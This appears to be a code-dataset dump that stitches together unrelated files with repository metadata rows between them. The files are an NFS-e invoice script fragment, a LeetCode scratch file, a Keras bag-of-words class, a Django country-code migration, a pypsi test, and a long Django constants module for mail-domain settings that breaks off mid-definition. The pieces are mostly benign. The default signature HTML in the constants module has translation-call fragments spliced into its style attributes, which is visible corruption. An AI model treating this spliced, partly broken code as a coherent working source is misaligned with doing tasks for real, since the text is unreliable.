providerSubscription = "12345678" # Provider city subscription
# NFSe Taker
companyName = "SOME COMPANY LTDA"
takerTaxId = "12345678000198"
objServ = Services(
certificateContent=open("../certfiles/converted.crt", "rb").read(),
rsaKeyContent=open("../certfiles/privRSAkey.pem", "rb").read(),
privateKeyContent=open("../certfiles/privateKey.key", "rb").read()
)
print(objServ.sendRPS(
taxId=taxId,
providerSubscription=providerSubscription,
rpsSeries="TESTE",
rpsNumber="5117092019",
rpsType="RPS",
issueDate="2019-07-01",
rpsStatus="N",
rpsTax="T",
issRetain="false",
servicesAmount="1",
deductionsAmount="0",
pisAmount="0",
irAmount="0",
csllAmount="0",
cofinsAmount="0",
inssAmount="0",
serviceCode="05895",
aliquot="2",
takerTaxId=takerTaxId,
companyName=companyName,
streetLine="Null",
streetNumber="0",
streetLine2="Null",
district="Null",
zipCode="00000000",
email="none@none",
description="Teste de emissão automática de NFS-e de boletos e transferências prestados",
))
| 25.145833 | 93 | 0.672742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.361983 |
eaaee56b527744c35b0a2e71b0cf37879102767a | 208 | py | Python | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | 1 | 2019-05-22T07:12:34.000Z | 2019-05-22T07:12:34.000Z | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | 3 | 2021-12-10T01:13:54.000Z | 2021-12-14T21:18:42.000Z | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time:2020/6/15 11:38
# @Author:TimVan
# @File:leetcode.py
# @Software:PyCharm
# Definition for singly-linked list.
# for j in range(10, 5, -1):
# print(j)
print('a'.find(' '))
| 17.333333 | 36 | 0.605769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.879808 |
eaaefc430961e4bbb80f4767f28ce779a21dba1e | 1,337 | py | Python | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | 9 | 2018-06-07T13:26:52.000Z | 2021-08-28T07:01:00.000Z | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | null | null | null | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | 2 | 2019-07-05T08:29:59.000Z | 2020-04-08T09:54:03.000Z | from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
class KerasBow(object):
"""doc
词袋模型:我们可以为数据集中的所有单词制作一张词表,然后将每个单词和一个唯一的索引关联。
每个句子都是由一串数字组成,这串数字是词表中的独立单词对应的个数。
通过列表中的索引,我们可以统计出句子中某个单词出现的次数。
"""
def __init__(self, num_words=20000, maxlen=None):
"""
:param maxlen: 句子序列最大长度
:param num_words: top num_words-1(词频降序):保留最常见的num_words-1词
"""
self.maxlen = maxlen
self.num_words = num_words
self.tokenizer = None
def fit(self, docs):
"""
:param corpus: ['some thing to do', 'some thing to drink']与sklearn提取文本特征一致
"""
print('Create Bag Of Words ...')
self.tokenizer = Tokenizer(self.num_words, lower=False) # 不改变大小写(需提前预处理)
self.tokenizer.fit_on_texts(docs)
print("Get Unique Words In Corpus: %s" % len(self.tokenizer.word_index))
return self
def transform(self, docs):
print('Docs To Sequences ...')
sequences = self.tokenizer.texts_to_sequences(docs)
pad_docs = pad_sequences(sequences, self.maxlen, padding='post')
if self.maxlen is None:
self.maxlen = pad_docs.shape[1]
return pad_docs
def fit_transform(self, docs):
self.fit(docs)
return self.transform(docs)
| 31.833333 | 82 | 0.644727 | 1,530 | 0.93578 | 0 | 0 | 0 | 0 | 0 | 0 | 747 | 0.456881 |
eaaf85302a7e40e5b38b9e1a9f53748e0813d733 | 1,300 | py | Python | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-02-18 16:24
from django.db import migrations
countries = {
"Ma\u010farsko": "HU",
"Czech Republic": "CZ",
"\u010cesk\xe1 republika": "CZ",
"United Kingdom": "GB",
"Austria": "AT",
"Madarsko": "HU",
"Australia": "AU",
"Srbsko": "RS",
"Kraj Vyso\u010dina, \u010cesk\xe1 republika": "CZ",
"\u010desk\xe1 republika": "CZ",
"\u010cR": "CZ",
"Plze\u0148sk\xfd kraj, \u010cesk\xe1 republika": "CZ",
"Sverige": "SE",
"serbia": "RS",
"\xd6sterreich": "AT",
"Switzerland": "CH",
"ma\u010farsk\xe1 \u013eudovo demokratick\xe1 ": "HU",
"Kosovo": "RS",
"India": "IN",
"Uzbekistan": "UZ",
"Uganda": "UG",
"litva": "LT",
"Velka Britania": "GB",
}
def fix_country_names(apps, schema_editor):
# We can't import the Person model directly as it may be a newer
# version than this migration expects. We use the historical version.
Address = apps.get_model("people", "Address")
for address in Address.objects.all():
address.country = countries.get(address.country, "SK")
address.save()
class Migration(migrations.Migration):
dependencies = [("people", "0010_merge")]
operations = [migrations.RunPython(fix_country_names)]
| 28.888889 | 73 | 0.614615 | 144 | 0.110769 | 0 | 0 | 0 | 0 | 0 | 0 | 724 | 0.556923 |
eab048820d03b22884f75124f36991ec3018d628 | 249 | py | Python | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 18 | 2015-01-07T19:05:29.000Z | 2022-01-09T02:33:23.000Z | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 30 | 2015-02-19T16:04:04.000Z | 2021-03-30T00:09:58.000Z | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 7 | 2016-01-02T17:55:48.000Z | 2020-11-22T14:52:32.000Z | from pypsi.shell import Shell
from pypsi.commands.tail import TailCommand
class CmdShell(Shell):
tail = TailCommand()
class TestTail:
def setup(self):
self.shell = CmdShell()
def teardown(self):
self.shell.restore()
| 16.6 | 43 | 0.678715 | 170 | 0.682731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eab1a5938cae0856924b0791262652f15b84a805 | 20,322 | py | Python | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
] | null | null | null | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
] | 1 | 2021-06-10T20:45:55.000Z | 2021-06-10T20:45:55.000Z | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
常量
'''
import base64
from django.utils.translation import ugettext_lazy as _
DOMAIN_BASIC_PARAMS = (
(u"cf_limit_mailbox_cnt", _(u"限定邮箱数量")),
#(u"cf_limit_alias_cnt", u"限定别名数量"), #这个开关没人用
(u"cf_limit_mailbox_size", _(u"限定邮箱空间总容量")),
(u"cf_limit_netdisk_size", _(u"限定网络硬盘总容量")),
(u"cf_limit_email_size", _(u"发送邮件限制大小")),
#(u"cf_limit_attach_size", u"WebMail单附件大小"), #新版webmail不需要这个按钮
(u"cf_def_mailbox_size", _(u"用户邮箱默认容量")),
(u"cf_def_netdisk_size", _(u"网络硬盘默认容量")),
)
DOMAIN_BASIC_PARAMS_VALUE = (
(u"cf_limit_mailbox_cnt", "8000"),
#(u"cf_limit_alias_cnt", "0"), #这个开关没人用
(u"cf_limit_mailbox_size", "0"),
(u"cf_limit_netdisk_size", "500"),
(u"cf_limit_email_size", "0"),
#(u"cf_limit_attach_size", "10"),
(u"cf_def_mailbox_size", "100"),
(u"cf_def_netdisk_size", "100"),
)
DOMAIN_BASIC_PARAMS_TYPE = (
(u"cf_limit_mailbox_cnt", "system"),
#(u"cf_limit_alias_cnt", "system"), #这个开关没人用
(u"cf_limit_mailbox_size", "system"),
(u"cf_limit_netdisk_size", "system"),
(u"cf_limit_email_size", "system"),
#(u"cf_limit_attach_size", "system"),
(u"cf_def_mailbox_size", "system"),
(u"cf_def_netdisk_size", "system"),
)
DOMAIN_BASIC_STATUS = (
(u"mailboxUsed", _(u"已分配邮箱")),
(u"aliasUsed", _(u"已分配别名")),
(u"spaceUsed", _(u"已分配邮箱空间")),
(u"netdiskUsed", _(u"已分配网盘空间")),
)
DOMAIN_REG_LOGIN_PARAMS = (
(u"sw_user_reg", _(u"用户申请邮箱功能")),
(u"sw_reg_ratify", _(u"管理员审核开通")),
#(u"sw_link_admin", u"管理员登陆链接显示在邮件系统登陆页"), #无语加无用的开关
(u"sw_welcome_letter", _(u"新用户欢迎信功能")),
(u"sw_agreement", _(u"新用户欢迎信功能")),
)
DOMAIN_REG_LOGIN_VALUE = (
(u"sw_user_reg", "-1"),
(u"sw_reg_ratify", "-1"),
#(u"sw_link_admin", "1"),
(u"sw_welcome_letter", "1"),
(u"sw_agreement", "1"),
)
DOMAIN_REG_LOGIN_TYPE = (
(u"sw_user_reg", "webmail"),
(u"sw_reg_ratify", "webmail"),
#(u"sw_link_admin", "webmail"),
(u"sw_welcome_letter", "system"),
(u"sw_agreement", "webmail"),
)
DOMAIN_REG_LOGIN_WELCOME_PARAMS = (
(u"cf_welcome_letter", _(u"欢迎信内容")),
)
DOMAIN_REG_LOGIN_WELCOME_VALUE = (
(u"cf_welcome_letter", ""),
)
DOMAIN_REG_LOGIN_WELCOME_TYPE = (
(u"cf_welcome_letter", "system"),
)
DOMAIN_REG_LOGIN_AGREE_PARAMS = (
(u"cf_agreement", _(u"用户注册协议")),
)
DOMAIN_REG_LOGIN_AGREE_VALUE = (
(u"cf_agreement", ""),
)
DOMAIN_REG_LOGIN_AGREE_TYPE = (
(u"cf_agreement", "webmail"),
)
DOMAIN_SYS_RECV_PARAMS = (
(u"limit_send", _(u"发信功能限制")),
(u"limit_recv", _(u"收信功能限制")),
(u"limit_pop", _(u"POP/POPS邮箱收取功能")),
(u"limit_imap", _(u"IMAP/IMAPS客户端邮件收发功能")),
(u"limit_smtp", _(u"SMTP/SMTPS客户端邮件发送功能")),
)
DOMAIN_SYS_RECV_VALUE = (
(u"limit_send", u"-1"),
(u"limit_recv", u"-1"),
(u"limit_pop", u"-1"),
(u"limit_imap", u"-1"),
(u"limit_smtp", u"-1"),
)
DOMAIN_SYS_RECV_TYPE = (
(u"limit_send", u"system"),
(u"limit_recv", u"system"),
(u"limit_pop", u"system"),
(u"limit_imap", u"system"),
(u"limit_smtp", u"system"),
)
DOMAIN_SYS_SECURITY_PARAMS = (
(u"sw_def_login_limit_mail", _(u"开启修改密码通知信")),
(u"cf_def_safe_login", _(u"安全登录限制")),
(u"cf_ip_limit", _(u"登陆IP限制")),
)
DOMAIN_SYS_SECURITY_VALUE = (
(u"sw_def_login_limit_mail", u"1"),
(u"cf_def_safe_login", u""),
(u"cf_ip_limit", u""),
)
DOMAIN_SYS_SECURITY_TYPE = (
(u"sw_def_login_limit_mail", u"system"),
(u"cf_def_safe_login", u"webmail"),
(u"cf_ip_limit", u"webmail"),
)
DOMAIN_SYS_SECURITY_PWD_PARAMS = (
(u"cf_def_login_limit_mail", _(u"修改密码通知信")),
)
DOMAIN_SYS_SECURITY_PWD_VALUES = (
(u"cf_def_login_limit_mail", u""),
)
DOMAIN_SYS_SECURITY_PWD_TYPE = (
(u"cf_def_login_limit_mail", u"system"),
)
DOMAIN_SYS_PASSWORD_PARAMS = (
(u"sw_pwdtimeout", _(u"定期密码修改设置")),
(u"cf_pwd_days", _(u"密码有效期间")),
#(u"cf_first_change_pwd", u"首次登录修改密码"),
(u"cf_pwd_type", _(u"密码组成字符种类")),
(u"cf_pwd_rule", _(u"其他密码规则设置")),
(u"cf_pwd_forbid", _(u"用户密码强度低于规则设置")),
)
DOMAIN_SYS_PASSWORD_VALUE = (
(u"sw_pwd_timeout", u"1"),
(u"cf_pwd_days", u"365"),
#(u"cf_first_change_pwd", u"-1"),
(u"cf_pwd_type", u"-1"),
(u"cf_pwd_rule", u""),
(u"cf_pwd_forbid", u""),
)
DOMAIN_SYS_PASSWORD_TYPE = (
(u"sw_pwd_timeout", u"system"),
(u"cf_pwd_days", u"system"),
#(u"cf_first_change_pwd", u"system"),
(u"cf_pwd_type", u"system"),
(u"cf_pwd_rule", u"system"),
(u"cf_pwd_forbid", u"system"),
)
# Password character-class requirement choices (value -> label).
DOMAIN_SYS_PASSWORD_TYPE_LIMIT = (
    (u"-1", _(u"必须包含两种字符")),
    (u"1", _(u"必须包含三种字符")),
    (u"2", _(u"必须包含四种字符")),
)
# Additional password rules: form field name -> stored setting key.
DOMAIN_SYS_PASSWORD_RULE_VALUE = (
    #(u"pwdLen", u"passwd_size"), forced on since version >= 2.2.59
    (u"pwdLenValue", u"passwd_size2"),
    (u"pwdNoAcct", u"passwd_name"),
    (u"pwdNumLimit", u"passwd_digital"),
    (u"pwdWordLimit", u"passwd_letter"),
    (u"pwdFlagLimit", u"passwd_letter2"),
    (u"pwdNoName", u"passwd_name2"),
)
# Actions taken when a password is weaker than the configured rules.
DOMAIN_SYS_PASSWORD_FORBID_RULE = (
    (u"pwdLimitForbidSend", u"forbid_send"),
    (u"pwdLimitForceChange", u"force_change"),
    (u"pwdLimitForbidSendInWeak", u"forbid_send_in_weak"),
    (u"pwdLimitForceChangeInWeak", u"force_change_in_weak"),
)
DOMAIN_SYS_PASSWORD_FORBID_RULE_DEFAULT = (
    (u"forbid_send", u"-1"),
    (u"force_change", u"-1"),
    (u"forbid_send_in_weak", u"1"),
    (u"force_change_in_weak", u"1"),
)
# Allowed minimum password lengths offered in the UI: "8" .. "16".
DOMAIN_SYS_PASSWORD_LEN_LIMIT = tuple([u"{}".format(v) for v in range(8,17)])
# Default values for each password rule ("1" = rule enabled).
DOMAIN_SYS_PASSWORD_RULE_LIMIT = (
    # whether password length is limited
    #(u"passwd_size", u"1"),
    # minimum password length
    (u"passwd_size2", u"8"),
    # password must not contain the account name
    (u"passwd_name", u"1"),
    # no runs of 3+ sequential digits
    (u"passwd_digital", u"1"),
    # no runs of 3+ sequential letters
    (u"passwd_letter", u"1"),
    # no runs of 3+ identical characters
    (u"passwd_letter2", u"1"),
    # must not contain the user's full name (any case)
    (u"passwd_name2", u"1"),
)
# --- External interface switches (3rd-party auth, IM push, XSS token) ---
DOMAIN_SYS_INTERFACE_PARAMS = (
    (u"sw_auth_api", _(u"第三方登录验证")),
    (u"sw_api_pwd_encry", _(u"接口修改密码是否加密")),
    (u"sw_impush", _(u"即时通讯软件集成")),
    (u"sw_xss_token", _(u"登录防止xss启用token验证")),
)
DOMAIN_SYS_INTERFACE_VALUE = (
    (u"sw_auth_api", u"-1"),
    (u"sw_api_pwd_encry", u"-1"),
    (u"sw_impush", u"-1"),
    (u"sw_xss_token", u"-1"),
)
DOMAIN_SYS_INTERFACE_TYPE = (
    (u"sw_auth_api", u"webmail"),
    (u"sw_api_pwd_encry", u"webmail"),
    (u"sw_impush", u"webmail"),
    (u"sw_xss_token", u"webmail"),
)
# Detailed configuration blobs behind the switches above.
DOMAIN_SYS_INTERFACE_AUTH_API_PARAMS = (
    (u"cf_auth_api", _(u"第三方登录验证")),
)
DOMAIN_SYS_INTERFACE_AUTH_API_VALUE = (
    (u"cf_auth_api", u""),
)
DOMAIN_SYS_INTERFACE_AUTH_API_TYPE = (
    (u"cf_auth_api", u"webmail"),
)
DOMAIN_SYS_INTERFACE_IM_API_PARAMS = (
    (u"cf_impush_api", _(u"即时通讯软件集成")),
)
DOMAIN_SYS_INTERFACE_IM_API_VALUE = (
    (u"cf_impush_api", u""),
)
DOMAIN_SYS_INTERFACE_IM_API_TYPE = (
    (u"cf_impush_api", u"webmail"),
)
# --- Miscellaneous system switches ---
DOMAIN_SYS_OTHERS_PARAMS = (
    #(u"sw_size_limit_recv", u"邮箱容量满后拒绝接收邮件"), 这个开关没意义,去掉了
    (u"sw_auto_clean", _(u"邮箱空间定时清理功能")),
    (u"sw_online_attach_switch", _(u"客户端网络附件开关")),
    #(u"sw_auto_inbox", u"登录默认打开收件箱"),
    (u"sw_filter_duplicate_mail", _(u"收件时是否过滤重复邮件")),
    # This switch is meaningless here; it should live in the common settings.
    (u"sw_display_list", _(u"邮件列表发来邮件显示邮件列表名称")),
    (u"sw_user_reg", _(u"用户申请邮箱功能")),
    #(u"sw_reg_ratify", _(u"管理员审核开通")),
    (u"sw_welcome_letter", _(u"新用户欢迎信功能")),
    # NOTE(review): label below duplicates sw_welcome_letter's label;
    # sw_agreement presumably refers to the signup agreement — confirm
    # the intended label before changing the translated string.
    (u"sw_agreement", _(u"新用户欢迎信功能")),
    (u"sw_recvsms", _(u"短信通知接收邮件")),
    (u"sw_sendsms", _(u"短信通知发送邮件")),
    (u"cf_sms_conf", _(u"短信模块设置")),
)
DOMAIN_SYS_OTHERS_VALUE = (
    #(u"sw_size_limit_recv", u"1"),
    (u"sw_auto_clean", u"1"),
    (u"sw_online_attach_switch", u"-1"),
    #(u"sw_auto_inbox", u"1"),
    (u"sw_filter_duplicate_mail", u"1"),
    (u"sw_display_list", u"1"),
    (u"sw_user_reg", "-1"),
    #(u"sw_reg_ratify", "-1"),
    (u"sw_welcome_letter", "1"),
    (u"sw_agreement", "1"),
    (u"sw_recvsms", u"-1"),
    (u"sw_sendsms", u"-1"),
    (u"cf_sms_conf", u""),
)
DOMAIN_SYS_OTHERS_TYPE = (
    #(u"sw_size_limit_recv", u"system"),
    (u"sw_auto_clean", u"webmail"),
    (u"sw_online_attach_switch", u"system"),
    #(u"sw_auto_inbox", u"webmail"),
    (u"sw_filter_duplicate_mail", u"webmail"),
    (u"sw_display_list", u"webmail"),
    (u"sw_user_reg", "webmail"),
    #(u"sw_reg_ratify", "webmail"),
    (u"sw_welcome_letter", "system"),
    (u"sw_agreement", "webmail"),
    (u"sw_recvsms", u"webmail"),
    (u"sw_sendsms", u"webmail"),
    (u"cf_sms_conf", u"system"),
)
# Mailbox space-cleaning configuration blobs.
DOMAIN_SYS_OTHERS_SPACE_PARAMS = (
    (u"cf_spaceclean", _(u"邮箱空间清理")),
    (u"cf_spacemail", _(u"邮箱空间清理")),
)
DOMAIN_SYS_OTHERS_SPACE_VALUE = (
    (u"cf_spaceclean", u""),
    (u"cf_spacemail", u""),
)
DOMAIN_SYS_OTHERS_SPACE_TYPE = (
    (u"cf_spaceclean", u"system"),
    (u"cf_spacemail", u"system"),
)
# Client network-attachment configuration blob.
DOMAIN_SYS_OTHERS_ATTACH_PARAMS = (
    (u"cf_online_attach", _(u"客户端网络附件")),
)
DOMAIN_SYS_OTHERS_ATTACH_VALUE = (
    (u"cf_online_attach", u""),
)
DOMAIN_SYS_OTHERS_ATTACH_TYPE = (
    (u"cf_online_attach", u"system"),
)
# --- Domain-wide mail signature (template + on/off switch) ---
DOMAIN_SIGN_PARAMS = (
    (u'cf_domain_signature',_(u'域签名')),
    (u'sw_domain_signature',_(u'域签名开关')),
)
DOMAIN_SIGN_VALUE = (
    (u'cf_domain_signature',u''),
    (u'sw_domain_signature',u'-1'),
)
DOMAIN_SIGN_TYPE = (
    (u'cf_domain_signature',u'system'),
    (u'sw_domain_signature',u'system'),
)
# --- Personal signature template ---
DOMAIN_SIGN_PERSONAL_PARAMS = (
    (u'cf_personal_sign',_(u'个人签名模板')),
)
DOMAIN_SIGN_PERSONAL_VALUE = (
    (u'cf_personal_sign',u''),
)
DOMAIN_SIGN_PERSONAL_TYPE = (
    (u'cf_personal_sign',u'webmail'),
)
# ------ Personal signature input parameters ------
# Default signature HTML with {NAME}/{POSITION}/{EMAIL}/... placeholders.
# NOTE(review): the literal contains stray `_(u"`/`")` fragments inside the
# style attributes — this looks like source corruption, but it is a runtime
# string, so it is left untouched here; confirm against the original template.
DOMAIN_PERSONAL_DEFAULT_CODE = """<p><span style="font-size:16px;"><strong>{NAME} [<span style="font-size:14px;">{POSITION}</span>]{DEPARTMENT}<br /></strong></span></p><p><span style="white-space:normal;font-size:16px;"><strong>{TELEPHONE}</strong></span></p><p><br /><strong></strong></p><p><span style="font-size:14px;_(u"><strong>这里填公司名称<br /></strong></span></p><p>地址:这里填公司地址</p><p>电话:<span style=")white-space:normal;_(u">{WORKPHONE} 传真:这里填传真号码 邮箱:{EMAIL}<br /></span></p><br /><p><span style=")white-space:normal;"><br /></span></p>"""
# NOTE(review): base64.encodestring() was deprecated and removed in Python
# 3.9, and in Python 3 it requires bytes; when moving off Python 2 this must
# become base64.encodebytes(...encode()).decode() — TODO confirm the runtime.
DOMAIN_PERSONAL_DEFAULT_CODE=base64.encodestring(DOMAIN_PERSONAL_DEFAULT_CODE)
DOMAIN_PERSONAL_DEFAULT_CODE=u"{}".format(DOMAIN_PERSONAL_DEFAULT_CODE)
# Defaults for the personal-signature behavior flags.
DOMAIN_SIGN_PERSONAL_VALUE_DEFAULT = (
    (u'personal_sign_new',u'-1'),
    (u'personal_sign_forward',u'-1'),
    (u'personal_sign_auto',u'1'),
    (u'personal_sign_templ',DOMAIN_PERSONAL_DEFAULT_CODE),
)
# --- Webmail "home" module switches ---
# All entries were retired with the new webmail UI; these now evaluate to
# empty tuples and are kept only so importers keep working.
DOMAIN_MODULE_HOME_PARAMS = (
    #(u'sw_business_tools', u'商务小工具栏目'), 新版本webmail去掉
    #(u'sw_wgt_cale', u'万年历'),
    #(u'sw_wgt_calc', u'万用计算器'),
    #(u'sw_wgt_maps', u'城市地图'),
    #(u'sw_email_used_see', u'用户已用邮箱容量查看功能'),
    #(u'sw_weather', u'天气预报功能'),
    #(u'sw_oab', u'企业通讯录'),
    #(u'sw_department_openall', u'企业通讯录域组合'),
    #(u'sw_dept_showall', u'父部门中是否显示子部门邮件账号'),
    #(u'sw_netdisk', u'网络硬盘功能'),
    #(u'sw_calendar', u'日程功能'),
    #(u'sw_notes', u'便签功能'),
)
DOMAIN_MODULE_HOME_VALUE = (
    #(u'sw_business_tools', u'1'),
    #(u'sw_wgt_cale', u'1'),
    #(u'sw_wgt_calc', u'1'),
    #(u'sw_wgt_maps', u'1'),
    #(u'sw_email_used_see', u'1'), #邮箱容量查看功能,这开关去掉
    #(u'sw_weather', u'1'),
    #(u'sw_oab', u'1'),
    #(u'sw_department_openall', u'1'),
    #(u'sw_dept_showall', u'1'),
    #(u'sw_netdisk', u'1'),
    #(u'sw_calendar', u'1'),
    #(u'sw_notes', u'1'),
)
DOMAIN_MODULE_HOME_TYPE = (
    #(u'sw_business_tools', u'webmail'),
    #(u'sw_wgt_cale', u'webmail'),
    #(u'sw_wgt_calc', u'webmail'),
    #(u'sw_wgt_maps', u'webmail'),
    #(u'sw_email_used_see', u'webmail'),
    #(u'sw_weather', u'webmail'),
    #(u'sw_oab', u'webmail'),
    #(u'sw_department_openall', u'webmail'),
    #(u'sw_dept_showall', u'webmail'),
    #(u'sw_netdisk', u'webmail'),
    #(u'sw_calendar', u'webmail'),
    #(u'sw_notes', u'webmail'),
)
# --- Webmail "mail" module switches ---
DOMAIN_MODULE_MAIL_PARAMS = (
    #(u'sw_drafts', u'保存草稿功能'),
    #(u'sw_mail_encryption', u'发送邮件显示加密选项'),
    #(u'sw_show_add_paper', u'显示地址簿和信纸模块'),
    #(u'sw_mailpaper', u'去掉信纸模块'),
    #(u'sw_auto_receipt', u'自动发送回执功能'), 这个开关在新版没什么意义
    (u'sw_mail_in_reply_to', _(u'添加Reply-To到邮件头')),
    (u'sw_mail_recall_notify', _(u'邮件召回成功后提示收件人')),
    (u'sw_save_client_sent_email', _(u'保存客户端已发送邮件')),
    (u'sw_oab_dumpbutton', _(u'通讯录导出按钮开关')),
    (u'oab_show_mod', _(u'企业通讯录设置')), # used by the new webmail UI
    (u'sw_oab_share', _(u'其他域通讯录共享')),
    (u'sw_cab', _(u'公共通讯录')),
)
DOMAIN_MODULE_MAIL_VALUE = (
    #(u'sw_drafts', u'1'),
    #(u'sw_mail_encryption', u'-1'),
    #(u'sw_show_add_paper', u'-1'),
    #(u'sw_mailpaper', u'-1'),
    #(u'sw_auto_receipt', u'1'),
    (u'sw_mail_in_reply_to', u'1'),
    (u'sw_mail_recall_notify', u'1'),
    (u'sw_save_client_sent_email', u'-1'),
    (u'sw_oab_dumpbutton', u'1'),
    (u'oab_show_mod', u'1'),
    (u'sw_oab_share', u'1'),
    (u'sw_cab', u'1'),
)
DOMAIN_MODULE_MAIL_TYPE = (
    #(u'sw_drafts', u'webmail'),
    #(u'sw_mail_encryption', u'webmail'),
    #(u'sw_show_add_paper', u'webmail'),
    #(u'sw_mailpaper', u'webmail'),
    #(u'sw_auto_receipt', u'webmail'),
    (u'sw_mail_in_reply_to', u'webmail'),
    (u'sw_mail_recall_notify', u'webmail'),
    (u'sw_save_client_sent_email', u'webmail'),
    (u'sw_oab_dumpbutton', u'webmail'),# whether the address-book export button shows
    (u'oab_show_mod', u'webmail'), # JSON blob: "show all departments" etc. button settings
    (u'sw_oab_share', u'webmail'),
    (u'sw_cab', u'webmail'),
)
# --- Webmail "settings" module switches ---
DOMAIN_MODULE_SET_PARAMS = (
    #(u'sw_change_userinfo', u'个人资料功能'),
    (u'sw_change_pass', _(u'密码修改功能')),
    #(u'sw_options', u'参数设置功能'),
    #(u'sw_signature', u'邮件签名功能'),
    #(u'sw_auto_reply', u'自动回复功能'),
    #(u'sw_auto_forward', u'自动转发功能'),
    #(u'sys_userbwlist', u'黑白名单功能'),
    #(u'sw_autoforward_visible', u'设置自动转发默认值'),
    (u'sw_mailboxmove', _(u'邮箱搬家功能')),
    (u'sw_feedback', _(u'邮箱意见反馈功能')),
    (u'sw_zhaohui', _(u'邮件召回记录查看')),
    (u'sw_cfilter', _(u'邮件过滤功能')),
    (u'sw_smtptransfer_visible', _(u'SMTP外发邮件代理')),
    (u'sw_realaddress_alert', _(u'代发邮件地址提醒')),
    (u'sw_time_mode', _(u'邮件内容中时间显示')),
)
DOMAIN_MODULE_SET_VALUE = (
    #(u'sw_change_userinfo', u'1'),
    (u'sw_change_pass', u'1'),
    #(u'sw_options', u'1'),
    #(u'sw_signature', u'1'),
    #(u'sw_auto_reply', u'1'),
    #(u'sw_auto_forward', u'1'),
    #(u'userbwlist', u'黑白名单功能'),
    #(u'sw_autoforward_visible', u'1'),
    (u'sw_mailboxmove', u'1'),
    (u'sw_feedback', u'1'),
    (u'sw_zhaohui', u'1'),
    (u'sw_cfilter', u'1'),
    (u'sw_smtptransfer_visible', u'-1'),
    (u'sw_realaddress_alert', u'1'),
    (u'sw_time_mode', u'-1'),
)
DOMAIN_MODULE_SET_TYPE = (
    #(u'sw_change_userinfo', u'webmail'),
    (u'sw_change_pass', u'webmail'),
    #(u'sw_options', u'webmail'),
    #(u'sw_signature', u'webmail'),
    #(u'sw_auto_reply', u'webmail'),
    #(u'sw_auto_forward', u'webmail'),
    #(u'userbwlist', u'-1'),
    #(u'sw_autoforward_visible', u'webmail'),
    (u'sw_mailboxmove', u'webmail'),
    (u'sw_feedback', u'webmail'),
    (u'sw_zhaohui', u'webmail'),
    (u'sw_cfilter', u'webmail'),
    (u'sw_smtptransfer_visible', u'webmail'),
    (u'sw_realaddress_alert', u'webmail'),
    (u'sw_time_mode', u'webmail'),
)
# --- Retired "other" module switches (now empty tuples) ---
DOMAIN_MODULE_OTHER_PARAMS = (
    #(u'sw_folder_clean', u'清空文件夹功能'),
    #(u'sw_user_score', u'用户积分功能'),
    # department mail list: this switch has no reason to exist
    #(u'sw_dept_maillist', u'部门邮件列表'),
)
DOMAIN_MODULE_OTHER_VALUE = (
    #(u'sw_folder_clean', u'-1'),
    #(u'sw_user_score', u'1'),
    #(u'sw_dept_maillist', u'-1'),
)
DOMAIN_MODULE_OTHER_TYPE = (
    #(u'sw_folder_clean', u'webmail'),
    #(u'sw_user_score', u'webmail'),
    #(u'sw_dept_maillist', u'webmail'),
)
# Mail secrecy grades.
DOMAIN_SECRET_GRADE_1 = u'0' # secret
DOMAIN_SECRET_GRADE_2 = u'1' # confidential
DOMAIN_SECRET_GRADE_3 = u'2' # top secret
DOMAIN_SECRET_GRADE_ALL = (
    (DOMAIN_SECRET_GRADE_1, _(u"秘密")),
    (DOMAIN_SECRET_GRADE_2, _(u"机密")),
    (DOMAIN_SECRET_GRADE_3, _(u"绝密")),
)
DOMAIN_PUBLIC_GENDER_CHOICES = (
    (u'M',_(u'男')),
    (u'F',_(u'女')),
)
# --- Per-domain quota limits shown in the domain list ---
DOMAIN_LIST_PARAMS = (
    (u"cf_limit_mailbox_cnt", _(u"限定邮箱数量")),
    (u"cf_limit_mailbox_size", _(u"限定邮箱空间总容量")),
    (u"cf_limit_netdisk_size", _(u"限定网络硬盘总容量")),
    (u"cf_limit_email_size", _(u"发送邮件限制大小")),
